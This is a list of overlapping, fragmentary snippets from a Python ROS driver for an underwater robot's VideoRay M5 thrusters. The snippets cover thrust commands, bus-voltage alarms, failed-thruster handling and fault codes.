"''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {} if __name__ == '__main__': PKG = 'sub8_videoray_m5_thruster'",
"= {x for x in self.failed_thrusters} for thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) #",
"''' window_duration - float (amount of seconds for which to keep a reading",
"named thruster Example names are BLR, FLH, etc. Raises RuntimeError if a thrust",
"not in offline_on_port and failed not in self.deactivated_thrusters): self.failed_thrusters.remove(failed) # Thruster came online",
"self.failed_thrusters == failed_before: rospy.logdebug('Failed thrusters:', self.failed_thrusters) self.update_thruster_out_alarm() def stop(self): ''' Commands 0 thrust",
"thruster names to the appropriate port - Given a command message, route that",
"won't come back online even if comms are good self.deactivated_thrusters.add(srv.thruster_name) # So that",
"M5 thrusters\" desc_msg = \"Specify a path to the configuration.json file containing the",
"non-zero thrust ''' port_name = self.thruster_to_port_map[name] target_port = self.ports[port_name] thruster_model = target_port.thruster_info[name] if",
"and make it available to other nodes - Instantiate ThrusterPorts, (Either simulated or",
"alarm if not self.failed_thrusters == failed_before: rospy.logdebug('Failed thrusters:', self.failed_thrusters) self.update_thruster_out_alarm() def stop(self): '''",
"for offline in offline_on_port: if offline not in self.failed_thrusters: self.failed_thrusters.add(offline) # Thruster went",
"} fault = int(message_keyword_args['fault']) faults = [] for code, fault_name in fault_codes.items(): if",
"# volts VMIN = 0 # volts class VoltageReading(object): def __init__(self, voltage, time):",
"severity = None if bus_voltage < self.warn_voltage: severity = 3 if bus_voltage <",
"(1 << 2): 'OVERCURRENT', (1 << 3): 'OVERTEMP', (1 << 4): 'STALL', (1",
"entered fault with status {}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault causes are: {}\".format(faults)) return def thrust_cb(self,",
"thruster bus voltage. As of May 2017, this is just a simple rolling",
"= self.ports[port_name] thruster_model = target_port.thruster_info[name] if thrust < thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]:",
"not still be true - David) if message_keyword_args['fault'] > 2: fault_codes = {",
"get_thruster_info(self, srv): ''' Get the thruster info for a particular thruster name '''",
"info for a particular thruster name ''' query_name = srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name]",
"= severity class ThrusterDriver(object): _dropped_timeout = 1.0 # s _window_duration = 30.0 #",
"__name__ == '__main__': PKG = 'sub8_videoray_m5_thruster' usage_msg = \"Interface to Sub8's VideoRay M5",
"node_id to ThrusterPort rospack = rospkg.RosPack() self.make_fake = rospy.get_param('simulate', False) if self.make_fake: rospy.logwarn(\"Running",
"take effect def get_thruster_info(self, srv): ''' Get the thruster info for a particular",
"are any updates to the list of failed thrusters, it will raise and",
"do anything if the thruster status is bad if thruster_status is None: return",
"return None for r in self.buffer: voltages.append(r.v) return np.mean(voltages) def check_bus_voltage(self): ''' Publishes",
"determined by comms self.deactivated_thrusters = set() # These will not come back online",
"- reading.t if age > self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self): ''' Returns average voltage",
"self.ports[port_name] thruster_model = target_port.thruster_info[name] if thrust < thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried",
"necessary ''' bus_voltage = self.get_voltage_estimate() if bus_voltage is None: return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity =",
"settings specified in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary for some settings",
"self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer() # check bus voltage if enough time has passed if",
"programmatically deactivate thrusters self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster) self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster)",
"thrusters (thruster mapper blocks until it can use this service) self.thruster_info_service = rospy.Service('thrusters/thruster_info',",
"are left for when smarter filtering is needed ''' VMAX = 50 #",
"the thrusters to the thruster dict and configure if present for thruster_name in",
"= srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction)",
"thrust): ''' Issue a a force command (in Newtons) to a named thruster",
"to Sub8's VideoRay M5 thrusters\" desc_msg = \"Specify a path to the configuration.json",
"if len(self.buffer) == 0: return None for r in self.buffer: voltages.append(r.v) return np.mean(voltages)",
"failed not in self.deactivated_thrusters): self.failed_thrusters.remove(failed) # Thruster came online # Don't try to",
"<= self.VMAX: self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer() # check bus voltage if enough time has",
"44.0) self.last_estimate_time = rospy.Time.now() self.WINDOW_DURATION = rospy.Duration(window_duration) self.ESTIMATION_PERIOD = rospy.Duration(0.2) self.cached_severity = 0",
"# ThrusterPort objects self.thruster_to_port_map = {} # node_id to ThrusterPort rospack = rospkg.RosPack()",
"older than the window_duration from buffer ''' for reading in self.buffer: age =",
"etc. Raises RuntimeError if a thrust value outside of the configured thrust bounds",
"# Set firmware settings port = self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster')",
"Track a thrust_dict, which maps thruster names to the appropriate port - Given",
"window. However add_reading and get_estimate methods are left for when smarter filtering is",
"3): 'OVERTEMP', (1 << 4): 'STALL', (1 << 5): 'STALL_WARN', } fault =",
"for name in self.thruster_to_port_map.keys()} # These alarms require this service to be available",
"queue_size=1) self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time = rospy.Time.now() self.WINDOW_DURATION",
"thrust calibration data\" parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter =",
"thrust_cb(self, msg): ''' Callback for receiving thrust commands These messages contain a list",
"<< 5): 'STALL_WARN', } fault = int(message_keyword_args['fault']) faults = [] for code, fault_name",
"self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster) self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster) @thread_lock(lock) def load_thruster_ports(self,",
"self.failed_thrusters) self.update_thruster_out_alarm() def stop(self): ''' Commands 0 thrust to all thrusters ''' for",
"self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self): ''' Removes readings older than the window_duration from buffer",
"self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1) self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage",
"= set() # This is only determined by comms self.deactivated_thrusters = set() #",
"comms are good (user managed) # Alarms self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False)",
"[] def add_reading(self, voltage, time): ''' Adds voltage readings to buffer ''' voltage",
"seconds for which to keep a reading in the buffer) ''' self.bus_voltage_alarm =",
"Header, Float64 from sub8_msgs.msg import Thrust, ThrusterStatus from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point",
"''' for reading in self.buffer: age = rospy.Time.now() - reading.t if age >",
"it available to other nodes - Instantiate ThrusterPorts, (Either simulated or real), for",
"enough time has passed if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self):",
"name, ThrusterStatus, queue_size=10) for name in self.thruster_to_port_map.keys()} # These alarms require this service",
"rospy.Time.now() - reading.t if age > self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self): ''' Returns average",
"\"Specify a path to the configuration.json file containing the thrust calibration data\" parser",
"# node_id to ThrusterPort rospack = rospkg.RosPack() self.make_fake = rospy.get_param('simulate', False) if self.make_fake:",
"or clear 'thruster-out' alarm if not self.failed_thrusters == failed_before: rospy.logdebug('Failed thrusters:', self.failed_thrusters) self.update_thruster_out_alarm()",
"Instantiate ThrusterPorts, (Either simulated or real), for communicating with thrusters - Track a",
"__init__(self, window_duration): ''' window_duration - float (amount of seconds for which to keep",
"work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() # Bus voltage self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration) # Command thrusters self.thrust_sub",
"= None if bus_voltage < self.warn_voltage: severity = 3 if bus_voltage < self.kill_voltage:",
"''' for port in self.ports.values(): for thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def fail_thruster(self,",
"until it can use this service) self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info) self.status_publishers =",
"alarm Updates the 'offline_thruster_names' parameter accordingly Sets the severity to the number of",
"fake=self.make_fake) # Add the thrusters to the thruster dict and configure if present",
"if name in self.failed_thrusters: if not np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver: commanding non-zero thrust to",
"ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id, power=power, effort=effort, thrust=thrust, **message_keyword_args ) ) # Will publish",
"still be true - David) if message_keyword_args['fault'] > 2: fault_codes = { (1",
"Send a thruster status message describing the status of the particular thruster '''",
"= parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout' rospy.loginfo(\"Thruster Driver waiting for parameter, {}\".format(layout_parameter)) thruster_layout",
"- Send a thruster status message describing the status of the particular thruster",
"# Command thrusters self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1) # To programmatically deactivate",
"and self.cached_severity != severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage has fallen to {}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage},",
"thrust, thruster_model.thrust_bounds)) if name in self.failed_thrusters: if not np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver: commanding non-zero",
"severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage has fallen to {}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage}, severity=severity ) self.cached_severity",
"<< 1): 'OVERRVOLT', (1 << 2): 'OVERCURRENT', (1 << 3): 'OVERTEMP', (1 <<",
"(1 << 5): 'STALL_WARN', } fault = int(message_keyword_args['fault']) faults = [] for code,",
"'.yaml') rospy.loginfo('Configuring {} with settings specified in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) #",
"ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return thruster_info def check_alarm_status(self, alarm): #",
"make sure to raise it again if not alarm.raised and alarm.node_name != self._NODE_NAME:",
"# Instantiate thruster comms port for port_info in ports_layout: port_name = port_info['port'] self.ports[port_name]",
"settings to take effect def get_thruster_info(self, srv): ''' Get the thruster info for",
"= wait_for_param(layout_parameter) if thruster_layout is None: raise IOError('/thruster_layout rosparam needs to be set",
"self.make_fake: rospy.logwarn(\"Running fake thrusters for simulation, based on parameter '/simulate'\") # Instantiate thruster",
"not in self.deactivated_thrusters): self.failed_thrusters.remove(failed) # Thruster came online # Don't try to do",
"ports_layout: port_name = port_info['port'] self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake) # Add the thrusters",
"'/simulate'\") # Instantiate thruster comms port for port_info in ports_layout: port_name = port_info['port']",
"dictionary ThrusterPort objects ''' self.ports = {} # ThrusterPort objects self.thruster_to_port_map = {}",
"= rospy.Time.now() - reading.t if age > self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self): ''' Returns",
"# Don't try to do anything if the thruster status is bad if",
"bounds is commanded Raises UnavailableThrusterException if a thruster that is offline is commanded",
"port name self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback on thrusters (thruster mapper blocks until it",
"IS MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name)) # Set firmware settings port = self.ports[port_name]",
"causes are: {}\".format(faults)) return def thrust_cb(self, msg): ''' Callback for receiving thrust commands",
"Publishes bus_voltage estimate and raises alarm if necessary ''' bus_voltage = self.get_voltage_estimate() if",
"which maps thruster names to the appropriate port - Given a command message,",
"Issue a a force command (in Newtons) to a named thruster Example names",
"= rospy.Time.now() self.WINDOW_DURATION = rospy.Duration(window_duration) self.ESTIMATION_PERIOD = rospy.Duration(0.2) self.cached_severity = 0 self.buffer =",
"online or offline offline_on_port = target_port.get_offline_thruster_names() for offline in offline_on_port: if offline not",
"add_reading and get_estimate methods are left for when smarter filtering is needed '''",
"def __init__(self, ports_layout, thruster_definitions): '''Thruster driver, an object for commanding all of the",
"fake thrusters for simulation, based on parameter '/simulate'\") # Instantiate thruster comms port",
"outside of the configured thrust bounds is commanded Raises UnavailableThrusterException if a thruster",
"severity is not None and self.cached_severity != severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage has fallen",
"and failed not in offline_on_port and failed not in self.deactivated_thrusters): self.failed_thrusters.remove(failed) # Thruster",
"thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise or clear 'thruster-out' alarm if not",
"any updates to the list of failed thrusters, it will raise and alarm",
"if message_keyword_args['fault'] > 2: fault_codes = { (1 << 0): 'UNDERVOLT', (1 <<",
"from ros_alarms import AlarmBroadcaster, AlarmListener lock = threading.Lock() class BusVoltageMonitor(object): ''' Class that",
"(in Newtons) to a named thruster Example names are BLR, FLH, etc. Raises",
"not come back online even if comms are good (user managed) # Alarms",
"Necessary for some settings to take effect def get_thruster_info(self, srv): ''' Get the",
"import rospkg import rosparam import threading import argparse from geometry_msgs.msg import Vector3 from",
"50 # volts VMIN = 0 # volts class VoltageReading(object): def __init__(self, voltage,",
"def update_thruster_out_alarm(self): ''' Raises or clears the thruster out alarm Updates the 'offline_thruster_names'",
"thread_lock, numpy_to_point from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster from sub8_thruster_comm import thruster_comm_factory",
"target_port.get_declared_thruster_names() and failed not in offline_on_port and failed not in self.deactivated_thrusters): self.failed_thrusters.remove(failed) #",
"query_name = srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position),",
"the buffer) ''' self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1) self.warn_voltage =",
"self.deactivated_thrusters.add(srv.thruster_name) # So that thruster_mapper updates the B-matrix self.update_thruster_out_alarm() return {} def unfail_thruster(self,",
"# These alarms require this service to be available before things will work",
"Raises UnavailableThrusterException if a thruster that is offline is commanded a non-zero thrust",
"Undervolt/overvolt faults are unreliable (might not still be true - David) if message_keyword_args['fault']",
"sub8_thruster_comm import thruster_comm_factory from ros_alarms import AlarmBroadcaster, AlarmListener lock = threading.Lock() class BusVoltageMonitor(object):",
"== 0: return None for r in self.buffer: voltages.append(r.v) return np.mean(voltages) def check_bus_voltage(self):",
"Driver waiting for parameter, {}\".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter) if thruster_layout is None: raise",
"needs to be set before launching the thruster driver') thruster_driver = ThrusterDriver(thruster_layout['thruster_ports'], thruster_layout['thrusters'])",
"from geometry_msgs.msg import Vector3 from std_msgs.msg import Header, Float64 from sub8_msgs.msg import Thrust,",
"add if it makes sense (the M5's will give nonsense feedback at times)",
"voltage >= self.VMIN and voltage <= self.VMAX: self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer() # check bus",
"maps thruster names to the appropriate port - Given a command message, route",
"offline in offline_on_port: if offline not in self.failed_thrusters: self.failed_thrusters.add(offline) # Thruster went offline",
"failed in copy.deepcopy(self.failed_thrusters): if (failed in target_port.get_declared_thruster_names() and failed not in offline_on_port and",
"voltage if enough time has passed if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD: self.check_bus_voltage()",
"- float (amount of seconds for which to keep a reading in the",
"for which to keep a reading in the buffer) ''' self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\")",
"available to other nodes - Instantiate ThrusterPorts, (Either simulated or real), for communicating",
"thrust_cmd.thrust) # Raise or clear 'thruster-out' alarm if not self.failed_thrusters == failed_before: rospy.logdebug('Failed",
"severity class ThrusterDriver(object): _dropped_timeout = 1.0 # s _window_duration = 30.0 # s",
"= rospy.Duration(0.2) self.cached_severity = 0 self.buffer = [] def add_reading(self, voltage, time): '''",
"thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def fail_thruster(self, srv): ''' Makes a thruster unavailable",
"good self.deactivated_thrusters.add(srv.thruster_name) # So that thruster_mapper updates the B-matrix self.update_thruster_out_alarm() return {} def",
"thrust ''' port_name = self.thruster_to_port_map[name] target_port = self.ports[port_name] thruster_model = target_port.thruster_info[name] if thrust",
"Command thrusters self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1) # To programmatically deactivate thrusters",
"come back online even if comms are good (user managed) # Alarms self.thruster_out_alarm",
"thruster dict and configure if present for thruster_name in port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port']",
"BusVoltageMonitor(object): ''' Class that estimates sub8's thruster bus voltage. As of May 2017,",
"numpy as np import copy import rospy import rospkg import rosparam import threading",
"of failed thrusters, it will raise and alarm ''' failed_before = {x for",
"= [] if len(self.buffer) == 0: return None for r in self.buffer: voltages.append(r.v)",
"= {key: thruster_status[key] for key in message_contents} power = thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish(",
"(rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' + thruster_name + '.yaml') rospy.loginfo('Configuring {} with settings specified in",
"offline offline_on_port = target_port.get_offline_thruster_names() for offline in offline_on_port: if offline not in self.failed_thrusters:",
"that thrust is not allocated to the thruster self.failed_thrusters.add(srv.thruster_name) # So that it",
"self.buffer.remove(reading) def get_voltage_estimate(self): ''' Returns average voltage in buffer ''' voltages = []",
"thrusters - Track a thrust_dict, which maps thruster names to the appropriate port",
"alarms require this service to be available before things will work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm()",
"# So that it won't come back online even if comms are good",
"an object for commanding all of the sub's thrusters - Gather configuration data",
"update_thruster_out_alarm(self): ''' Raises or clears the thruster out alarm Updates the 'offline_thruster_names' parameter",
"rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time = rospy.Time.now() self.WINDOW_DURATION = rospy.Duration(window_duration) self.ESTIMATION_PERIOD",
"failed not in offline_on_port and failed not in self.deactivated_thrusters): self.failed_thrusters.remove(failed) # Thruster came",
"it again if not alarm.raised and alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self): '''",
"voltage = float(voltage) # Only add if it makes sense (the M5's will",
"port in self.ports.values(): for thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def fail_thruster(self, srv): '''",
"to other nodes - Instantiate ThrusterPorts, (Either simulated or real), for communicating with",
"= time def __init__(self, window_duration): ''' window_duration - float (amount of seconds for",
"to raise it again if not alarm.raised and alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm() def",
"is only determined by comms self.deactivated_thrusters = set() # These will not come",
"path to the configuration.json file containing the thrust calibration data\" parser = argparse.ArgumentParser(usage=usage_msg,",
"rospy.Publisher('bus_voltage', Float64, queue_size=1) self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time =",
"average voltage in buffer ''' voltages = [] if len(self.buffer) == 0: return",
"names are BLR, FLH, etc. Raises RuntimeError if a thrust value outside of",
"on parameter '/simulate'\") # Instantiate thruster comms port for port_info in ports_layout: port_name",
"Callback for receiving thrust commands These messages contain a list of instructions, one",
"import argparse from geometry_msgs.msg import Vector3 from std_msgs.msg import Header, Float64 from sub8_msgs.msg",
"{} def unfail_thruster(self, srv): ''' Undoes effect of self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm()",
"severity = 3 if bus_voltage < self.kill_voltage: severity = 5 if severity is",
"reading in self.buffer: age = rospy.Time.now() - reading.t if age > self.WINDOW_DURATION: self.buffer.remove(reading)",
"for when smarter filtering is needed ''' VMAX = 50 # volts VMIN",
"comms self.deactivated_thrusters = set() # These will not come back online even if",
"@thread_lock(lock) def load_thruster_ports(self, ports_layout, thruster_definitions): ''' Loads a dictionary ThrusterPort objects ''' self.ports",
"thruster status message describing the status of the particular thruster ''' self.failed_thrusters =",
"len(self.failed_thrusters) > 0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5))) else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME,",
"= thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id, power=power, effort=effort, thrust=thrust, **message_keyword_args",
"self.get_thruster_info) self.status_publishers = {name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10) for name in self.thruster_to_port_map.keys()}",
"else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}) @thread_lock(lock) def command_thruster(self, name, thrust): ''' Issue a",
"''' Publishes bus_voltage estimate and raises alarm if necessary ''' bus_voltage = self.get_voltage_estimate()",
"a thruster status message describing the status of the particular thruster ''' self.failed_thrusters",
"rospy.loginfo('Configuring {} with settings specified in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary",
"sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster from sub8_thruster_comm import thruster_comm_factory from ros_alarms import",
"target_port.get_offline_thruster_names() for offline in offline_on_port: if offline not in self.failed_thrusters: self.failed_thrusters.add(offline) # Thruster",
"for each thruster If there are any updates to the list of failed",
"route that command to the appropriate port/thruster - Send a thruster status message",
"# Create ThrusterPort objects in a dict indexed by port name self.load_thruster_ports(ports_layout, thruster_definitions)",
"= \"Specify a path to the configuration.json file containing the thrust calibration data\"",
"= [ 'rpm', 'bus_v', 'bus_i', 'temp', 'fault', 'command_tx_count', 'status_rx_count', 'command_latency_avg' ] message_keyword_args =",
"May 2017, this is just a simple rolling average with a constant width",
"self.failed_thrusters} for thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise or clear 'thruster-out' alarm",
"- David) if message_keyword_args['fault'] > 2: fault_codes = { (1 << 0): 'UNDERVOLT',",
"self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake) # Add the thrusters to the thruster dict",
"sense (the M5's will give nonsense feedback at times) if voltage >= self.VMIN",
"# So that thrust is not allocated to the thruster self.failed_thrusters.add(srv.thruster_name) # So",
"Example names are BLR, FLH, etc. Raises RuntimeError if a thrust value outside",
"# Bus voltage self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration) # Command thrusters self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust,",
"configuration data and make it available to other nodes - Instantiate ThrusterPorts, (Either",
"is None: raise IOError('/thruster_layout rosparam needs to be set before launching the thruster",
"Undoes effect of self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {} if __name__ ==",
"give nonsense feedback at times) if voltage >= self.VMIN and voltage <= self.VMAX:",
"self.WINDOW_DURATION = rospy.Duration(window_duration) self.ESTIMATION_PERIOD = rospy.Duration(0.2) self.cached_severity = 0 self.buffer = [] def",
"def check_bus_voltage(self): ''' Publishes bus_voltage estimate and raises alarm if necessary ''' bus_voltage",
"before things will work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() # Bus voltage self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration) #",
"= ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return thruster_info def check_alarm_status(self, alarm):",
"self.last_estimate_time = rospy.Time.now() self.WINDOW_DURATION = rospy.Duration(window_duration) self.ESTIMATION_PERIOD = rospy.Duration(0.2) self.cached_severity = 0 self.buffer",
"AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False) # Prevent outside interference # Create ThrusterPort objects in",
"in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise or clear 'thruster-out' alarm if not self.failed_thrusters",
"to do anything if the thruster status is bad if thruster_status is None:",
"alarm ''' failed_before = {x for x in self.failed_thrusters} for thrust_cmd in list(msg.thruster_commands):",
"sure to raise it again if not alarm.raised and alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm()",
"message_keyword_args)) rospy.logwarn(\"Fault causes are: {}\".format(faults)) return def thrust_cb(self, msg): ''' Callback for receiving",
"# Thruster came online # Don't try to do anything if the thruster",
"keep a reading in the buffer) ''' self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub = rospy.Publisher('bus_voltage',",
"faults are unreliable (might not still be true - David) if message_keyword_args['fault'] >",
"cleared this alarm, we need to make sure to raise it again if",
"fallen to {}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage}, severity=severity ) self.cached_severity = severity class ThrusterDriver(object): _dropped_timeout",
"not alarm.raised and alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self): ''' Raises or clears",
"= [] def add_reading(self, voltage, time): ''' Adds voltage readings to buffer '''",
"for parameter, {}\".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter) if thruster_layout is None: raise IOError('/thruster_layout rosparam",
"back online even if comms are good self.deactivated_thrusters.add(srv.thruster_name) # So that thruster_mapper updates",
"(failed in target_port.get_declared_thruster_names() and failed not in offline_on_port and failed not in self.deactivated_thrusters):",
"= target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately get thruster_status back thruster_status = target_port.command_thruster(name, effort) #",
"({})'.format( thrust, thruster_model.thrust_bounds)) if name in self.failed_thrusters: if not np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver: commanding",
"thrusters - Gather configuration data and make it available to other nodes -",
"again if not alarm.raised and alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self): ''' Raises",
"To programmatically deactivate thrusters self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster) self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster,",
"there are any updates to the list of failed thrusters, it will raise",
"registered\".format(thruster_name)) # Set firmware settings port = self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id'] config_path =",
"Vector3 from std_msgs.msg import Header, Float64 from sub8_msgs.msg import Thrust, ThrusterStatus from mil_ros_tools",
"from sub8_thruster_comm import thruster_comm_factory from ros_alarms import AlarmBroadcaster, AlarmListener lock = threading.Lock() class",
"rosparam needs to be set before launching the thruster driver') thruster_driver = ThrusterDriver(thruster_layout['thruster_ports'],",
"of the particular thruster ''' self.failed_thrusters = set() # This is only determined",
"VideoRay M5 thrusters\" desc_msg = \"Specify a path to the configuration.json file containing",
"self.warn_voltage: severity = 3 if bus_voltage < self.kill_voltage: severity = 5 if severity",
"even if comms are good self.deactivated_thrusters.add(srv.thruster_name) # So that thruster_mapper updates the B-matrix",
"fault != 0: faults.append(fault_name) rospy.logwarn(\"Thruster: {} has entered fault with status {}\".format(name, message_keyword_args))",
"rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info) self.status_publishers = {name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10) for name",
"!= 0: faults.append(fault_name) rospy.logwarn(\"Thruster: {} has entered fault with status {}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault",
"code, fault_name in fault_codes.items(): if code & fault != 0: faults.append(fault_name) rospy.logwarn(\"Thruster: {}",
"thruster_model = target_port.thruster_info[name] if thrust < thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to",
"= [] for code, fault_name in fault_codes.items(): if code & fault != 0:",
"a thruster unavailable for thrust allocation ''' # So that thrust is not",
"# So that thruster_mapper updates the B-matrix self.update_thruster_out_alarm() return {} def unfail_thruster(self, srv):",
"= voltage self.t = time def __init__(self, window_duration): ''' window_duration - float (amount",
"fault = int(message_keyword_args['fault']) faults = [] for code, fault_name in fault_codes.items(): if code",
"# volts class VoltageReading(object): def __init__(self, voltage, time): self.v = voltage self.t =",
"'bus_v', 'bus_i', 'temp', 'fault', 'command_tx_count', 'status_rx_count', 'command_latency_avg' ] message_keyword_args = {key: thruster_status[key] for",
"< thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command thrust ({}) outside of",
